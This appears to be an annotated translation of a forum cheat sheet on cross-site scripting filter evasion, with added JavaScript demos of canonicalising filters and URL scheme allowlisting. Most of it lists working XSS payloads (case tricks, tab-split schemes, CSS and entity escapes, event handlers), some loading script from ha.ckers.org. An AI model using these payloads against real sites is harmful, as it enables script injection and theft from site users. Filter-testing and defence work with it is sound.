1. Change the case of the characters

<sCript>alert('d')</scRipT>

(HTML tag and attribute names are case-insensitive, so a filter that looks for the literal lowercase string "<script>" lets this straight through. Any regex on markup needs the i flag at minimum.)
2. Add extra characters to get past the regular-expression check

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

(These defeat regexes that find the end of a tag by stopping at the first ">". The HTML tokenizer treats a ">" inside a quoted attribute value as ordinary data, so the real tag runs on to SRC="t.js". The backtick variant only worked in IE, which accepted ` as an attribute quote character.)
3. Use a different extension instead of .js

<script src="bad.jpg"></script>

(The extension in the URL is irrelevant; the browser runs whatever the response body is as JavaScript. What does matter is the Content-Type: current browsers refuse to execute a script response served as image/*, audio/*, video/* or text/csv, and X-Content-Type-Options: nosniff makes them refuse anything that is not a JavaScript MIME type.)
4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example (contents of xss.css):

body {

background-image: url('javascript:alert("XSS");')

}

(A javascript: URL inside a CSS url() only executed in old IE; current browsers treat it as a failed image load.)
5. Insert other characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

(The tokenizer accepts "/" anywhere whitespace could separate the tag name from its attributes, so a regex that insists on "<script " or "<script>" never matches.)

6. Use a tab or a newline to evade

<img src="jav ascr ipt:alert('XSS3')">   (the gaps inside "javascript" are tab characters; the forum rendering shows them as spaces)

<img src="jav ascr ipt:alert('XSS3')">   (the same payload with newlines in place of the tabs)

<IMG SRC="jav ascript:alert('XSS');">   (a single tab)

-> tab

-> new line

(Browsers strip ASCII tab, LF and CR from a URL before they parse its scheme, so "jav<TAB>ascript:" is still the javascript: scheme. An ordinary space is not stripped and breaks the scheme, which is why the trick needs a tab or newline specifically.)
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

(The CSS tokenizer drops a backslash in front of a non-hex character and drops /* */ comments, so "expre\ssi\on" and "expr/*x*/ession" both read as expression to the CSS parser but not to a regex looking for the literal word. CSS expression() itself is IE-only and was removed in IE8 standards mode, so these payloads only fire in old IE or in compatibility mode.)
8. Use hex encoding to evade (the ";" may also be left out)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

(The first line of each pair was the encoded form and the "source" line the decoded form, but the encoded copies were rendered back to plain text when this post was copied, so both lines now read the same. The technique: CSS accepts "\" followed by one to six hex digits as a character escape, and HTML attribute values accept numeric character references "&#NN;" / "&#xNN;", which the HTML parser also accepts without the trailing ";". Both are decoded before the value is interpreted, so a filter that matches the literal strings "expression" or "javascript:" never sees them.)
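The same point made in code, as an added example that is not part of the original post: a naive blacklist regex next to a filter that first canonicalizes the input the way a browser would, both run over the payloads of sections 1, 2, 5, 6, 7 and 8 above. The payloads are constructed here for the demo; the tab and newline ones are written with \t and \n because the forum rendering collapsed them to spaces, and the two encoded forms for section 8 (a CSS \0073 escape and a &#106; character reference) are my own reconstructions, since the post's encoded copies were lost.

```javascript
// Added example (not from the original post): naive blacklist regex versus a
// canonicalising filter, run over the evasion payloads of sections 1-8.
// All inputs are constructed here; the two hex-encoded payloads are my own
// reconstruction of the kind of thing section 8 describes.

const payloads = {
  "1 mixed case":           "<sCript>alert('d')</scRipT>",
  "2 extra chars":          "<<script>alert('c')//<</script>",
  "5 slash in tag":         "<SCRIPT/SRC=\"t.js\"></SCRIPT>",
  "6 tab in scheme":        "<img src=\"jav\tascr\tipt:alert('XSS3')\">",
  "6 newline in scheme":    "<IMG SRC=\"jav\nascript:alert('XSS');\">",
  "7 css backslash":        "<DIV STYLE=\"width: expre\\ssi\\on(alert('XSS31'));\">",
  "7 css comment":          "<IMG STYLE=\"xss:expr/*anyword*/ession(alert('sss'))\">",
  "8 css hex escape":       "<DIV STYLE=\"width: expre\\0073\\0073ion(alert('XSS31'));\">",
  "8 html entity":          "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=&#106;avascript:alert('abc');\">",
  "8 entity, no semicolon": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=&#106avascript:alert('abc');\">",
};

// What a careless filter looks for: the literal, lowercase tokens.
const BLOCK = /<script[\s\/>]|javascript:|expression\(/;

function naiveFilterBlocks(markup) {
  return BLOCK.test(markup);
}

// Undo the transformations the browser undoes before it interprets a value,
// in the order the browser applies them: character references first (HTML
// attribute parsing), then CSS escapes and comments, then the whitespace and
// control characters that URL and CSS tokenizers ignore, then case.
function canonicalize(markup) {
  let s = markup;
  s = s.replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)));
  s = s.replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
  s = s.replace(/\\([0-9a-f]{1,6})\s?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)));
  s = s.replace(/\\(.)/g, "$1");          // "\s" -> "s" (backslash before a non-hex char)
  s = s.replace(/\/\*[\s\S]*?\*\//g, ""); // strip /* comments */
  s = s.replace(/[\x00-\x20]/g, "");      // drop tab, newline, NUL, space ...
  return s.toLowerCase();
}

function canonicalFilterBlocks(markup) {
  return BLOCK.test(canonicalize(markup));
}

// Run both filters over every payload and report which ones each catches.
function evaluateFilters(samples = payloads) {
  return Object.entries(samples).map(([name, markup]) => ({
    name,
    naive: naiveFilterBlocks(markup),
    canonical: canonicalFilterBlocks(markup),
  }));
}

for (const row of evaluateFilters()) {
  console.log(`${row.name.padEnd(24)} naive=${row.naive}  canonical=${row.canonical}`);
}
```

Run with node: the naive regex catches only the "2 extra chars" payload, because that is the one that still contains a literal "<script>"; the canonicalising filter catches all ten. Even so, a canonicalised blacklist is a detection aid, not a fix: the real defence is context-aware output encoding, an allowlist sanitizer for any HTML you must keep, and a Content-Security-Policy, none of which need to guess how a browser will decode the input.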

9. Script in an HTML tag (event handler attributes)

<body onload="alert('onload')">

Any of these attributes will do:

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

(This list comes from the IE-era DOM; entries such as onbeforeeditfocus, onpropertychange or onrowenter are IE-only, but the standard ones, onload, onerror, onclick, onmouseover and so on, fire in every browser. Unlike most of the IE-specific tricks in this post, event handler attributes still matter today, and a filter has to reject the whole on* attribute family, not a fixed list.)
10. XSS code inside an .swf

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

(AllowScriptAccess="always" lets the Flash movie call into the embedding page's JavaScript. Flash is no longer supported by current browsers.)

11. Use CDATA to split the XSS code and let the browser reassemble it

<XML ID=I><X><C>

<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

</C></X>

</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

(The string "javascript:" never appears contiguously in the markup; the CDATA sections or the comment are removed when the bound value is rendered as HTML. XML data islands and DATASRC/DATAFLD binding are IE-only.)
12. Use HTML+TIME

<HTML><BODY>

<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

<?import namespace="t" implementation="#default#time2">

<t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">

</BODY></HTML>

(IE-only. The t:set element assigns innerHTML through the HTML+TIME behavior, so the script tag never appears as a <script> element in the source; it sits entity-encoded inside the "to" attribute value, and DEFER makes IE run it once inserted.)

13. Write a cookie through META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

(Useful where the application later echoes the cookie value into a page unescaped. Current browsers ignore http-equiv="Set-Cookie".)

14. javascript: in src, href and url()

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(Of these, javascript: in IFRAME or FRAME SRC still executes in every current browser, as does javascript: in an A HREF once clicked. The IMG SRC, DYNSRC, LOWSRC, TABLE BACKGROUND, LINK HREF and CSS url() forms only fired in old engines (IE 6 era, Netscape 4); current browsers treat them as a failed resource load. The lesson for a filter is the same in both cases: the scheme of the URL has to be allowlisted, not the tag.)
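The check that section 14 (and the tab/newline trick of section 6) calls for, as an added example that is not part of the original post: allowlist the scheme of an attribute value with the WHATWG URL parser instead of a regex, so the same normalisation the browser applies before it decides what "jav<TAB>ascript:" means (tab and newline removal, leading-space stripping, case-folding of the scheme) is applied before the check. The base URL and the sample values are constructed for the demo.

```javascript
// Added example (not from the original post): scheme allowlisting for URL-valued
// attributes (src, href, url()) using the WHATWG URL parser, which performs the
// same normalisation a browser performs before it interprets the scheme.
// DEMO_BASE and the sample values are constructed for this demo.

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);
const DEMO_BASE = "https://example.com/page"; // assumed origin of the page being protected

// Returns true only if the value, resolved the way the browser would resolve it,
// ends up with an allowlisted scheme. Anything unparsable is rejected, not guessed at.
function isSafeUrl(value, base = DEMO_BASE) {
  let url;
  try {
    url = new URL(value, base); // relative values resolve against the page's URL
  } catch {
    return false;
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

// Attribute values as the DOM hands them over (character references already
// decoded), paired with the verdict we expect.
const samples = [
  ["javascript:alert('XSS27')", false],
  ["JaVaScRiPt:alert(1)", false],        // scheme is case-folded by the parser
  ["jav\tascr\tipt:alert('XSS3')", false], // section 6: tabs are removed before parsing
  ["jav\nascript:alert('XSS')", false],  // section 6: so are newlines
  ["  javascript:alert(1)", false],      // leading spaces/controls are stripped
  ["vbscript:msgbox(1)", false],
  ["data:text/html,<script>alert(1)</script>", false],
  ["https://ha.ckers.org/xss.js", true],
  ["t.js", true],                        // relative: resolves to https://example.com/t.js
  ["jav ascript:alert(1)", true],        // a plain space is NOT removed: this is a harmless relative URL
];

// Run every sample through the check; a row with safe !== expected is a bug.
function runSamples(list = samples) {
  return list.map(([value, expected]) => ({ value, safe: isSafeUrl(value), expected }));
}

for (const row of runSamples()) {
  console.log(`${row.safe === row.expected ? "ok  " : "FAIL"} safe=${row.safe}  ${JSON.stringify(row.value)}`);
}
```

Two caveats a practitioner should keep in mind. First, run the check on the decoded attribute value, never on raw markup: given the raw string "javascript&#58;alert(1)" the parser sees no scheme at all and resolves it as a relative path, so isSafeUrl returns true, while the browser's HTML parser will have turned "&#58;" into ":" before it ever reaches the URL parser. Second, a scheme allowlist says nothing about the host; "//ha.ckers.org/xss.js" passes as https:, so if the attribute is a script src you also need a host allowlist or, better, a Content-Security-Policy.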